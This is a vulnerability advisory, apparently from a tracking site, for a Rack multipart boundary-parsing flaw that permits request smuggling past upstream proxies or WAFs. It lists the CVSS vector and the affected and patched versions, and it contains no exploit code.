EUVD-2026-18368
GHSA-vgpv-f759-9wx3
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N
Lifecycle Timeline
4Description
Rack is a modular Ruby web server interface. Prior to versions 2.2.23, 3.1.21, and 3.2.6, Rack::Multipart::Parser extracts the boundary parameter from multipart/form-data using a greedy regular expression. When a Content-Type header contains multiple boundary parameters, Rack selects the last one rather than the first. In deployments where an upstream proxy, WAF, or intermediary interprets the first boundary parameter, this mismatch can allow an attacker to smuggle multipart content past upstream inspection and have Rack parse a different body structure than the intermediary validated. This issue has been patched in versions 2.2.23, 3.1.21, and 3.2.6.
Analysis
Rack's multipart form data parser uses a greedy regular expression that selects the last boundary parameter from a Content-Type header instead of the first, allowing request smuggling when upstream proxies or WAFs interpret the first boundary. This mismatch enables attackers to bypass upstream inspection by crafting multipart requests with duplicate boundary declarations, causing Rack to parse a different body structure than the intermediary validated. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today